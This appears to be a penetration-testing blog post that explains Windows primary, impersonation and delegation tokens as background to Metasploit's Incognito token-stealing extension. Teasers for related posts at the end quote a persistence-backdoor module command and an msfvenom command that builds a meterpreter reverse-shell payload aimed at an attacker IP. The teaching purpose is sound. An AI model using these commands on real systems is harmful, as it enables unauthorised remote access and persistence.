The Incognito

-

                               THE INCOGNITO




No nope we aren't talking about this thing here





We are talking about a metasploit module which looks something like this





Well specificially its about the what the impersonation and deligation tokens are


le what haters think :




Incognito token is a very powerfull extenstion which helps us to steal windows tokens and impersonate them , but have you ever thought what are these tokens actually and why do windows use them ? well then I am glad that we are on the same page ! and here I am making clear things to you.

So lets get started already !

When a user logs into a system there are a lot of processes created on his behalf , for instance explorer.exe which helps in running the desktop in Windows xp machines especially. So what windows does is that it goes ahead and gives a primary token to the user process

Some of the things the primary token  : 

SID

Groups

Privilages and Much more stuff

SID is know as security identifier which helps in unique identification of a particular user

Groups is something that is self explanatory , its just the info of the groups the user is part of

Privilages is something a user who is logged in is allowed to do

And if the same user process as multiple threads which we find it most common , then same primary token associated with the user process is shared with the thread.

Ok now that the big deal about these primary tokens ?

Well this acts as an authorization evidence , So whenever a user process or its threads wants to access a resource which requries certain level of privilage , then the primary token of the user process is taken and it compared against the privilage of the requested resource . If the token has sufficient privilages , then it gains access to the resource , and else no good.

So having an idea about tokens let's dig deeper shall we ?!

Impersonation tokens :

For instance let's say that there is an FTP server running on a system and this server process has a primary token associated with it based on the user who ran the ftp processes and now let's say that each one of the threads (which also possess same primiary of the ftp process) of the ftp server processes is being used to serve a client who connects to the server. So till here everthing is well and good and here we come to the main part, when a remote user (lets say user1) logs in  , the thread should be able to access all the files and folder that user1 has access to shouldn't it ?! but how will it be able to access them if it possess the primiary token of the user who ran the process ? as the user who ran the process may or may not have that level of privilage and so the thread gotta somehow possess the identify of user user1 to meet the privilages and this is where Impersonation of tokens comes into play. The ftp process thread goes ahead and creates an impersonation token for user1 , and using this impersonation token the thread will be able to access the things which user1 would actually be able to access . And when the user1 is done with the requests and logs off , the thread forsakes the token and possess its own primary token.

So in a nutshell an impersonation token is a mechinism where a process or a thread temporarily can assume the identity of some other user .

Levels of Impersonation Tokens : 

1)  Impersonation : 

Well as we have already this will let the server to act on behalf of the client who authenticates to it , but only on the local machine on which the server is running

2) Deligation :

Here the impersonation can even extend to remote systems


                                               That's all it is to it , good bye and imma see you again ;)

Comments

Post a Comment

Popular posts from this blog

Learning Nmap Host Discovery with iptables and Wireshark Analysis

-
Image
Learning Nmap Host Discovery with Iptables  and Wireshark Analysis Finally the wait is no longer , we are going to learn host discovery using nmap in a very detailed way. Well you might say that there are many videos and blogs out there what is special about this one ? , In this blog I will be sharing my knowledge after going through several videos , nmap book and many other blogs in the most detailed way possible , well you will see the difference after going through the blog . When I say I really mean it . Heads up !! you must know basis of iptables before going through the blog  and you might ask why ? coz we not just learning just by saying that nmap blocks the packets so this host discovery isn't going to work.  we are going to block the packets and run the discovery again and bypass the our rules ourselves that how this blog is designed very thing is practical practical and practical . How cool is that ?!. well I wrote blog on iptables just for you !! click here an...
Read more

Persistence Techniques with Metasploit - Part 6

-
Image
     Persistence Techniques with Metasploit Getting a shell in real world requries a lot of hardwork and research , All this work put in so that we will be ok to loose the session when the user logs off or turns the computer off ? Hell no ! , we need to make our connection persistance so that we can get back alive when the computer's on or when the user logs in. And we will be taking a look into the post module section which helps us to make our connection persistence after exploiting the target machine. Note : For creating a persistence backdoor you should have already compromised the target machine and have the meterpreter shell  Pov : you have already exploited the target machine and had a meterpreter shell Commands :  use exploit/windows/local/persistence_exe show options Fig : 1.1 In Fig : 1.1 we can see the different options availabe REXENAME option defines the name of the exe file the module is going to put on the remote system REXEPATH denotes the local ...
Read more

Generating Payloads using Msfvenom - Metasploit Part 5

-
Image
Generating and encoding Payloads using  Msfvenom Well aparantely msfvenom is a seperate tool from msfconsole which is used to generate payloads but it doesn't mean that we cannot create payloads using msfconsole but the advantage of using msfvenom is that there is no need for us to be in the msfconsole to generate payloads but no worries we will be covering both the methods :) So let's hop onto it shall we ! Command : msfvenom --list Fig : 1.1 In Fig : 1.1 we can see using the command we can list a brief instructions on how to use different options with it To list different types of modules we can use Command : msfvenom --list [modules] eg:payloads Fig : 1.2 In Fig : 1.2 we can see the different types of available payloads we can use with msfvenom and obviously it is going to take a while when you execute the command to load loads of payloads Let's create a meterpreter staged payload Command : msfvenom -p windows/meterpreter/reverse_tcp LHOST=attacker_ip LPORT=port_number -...
Read more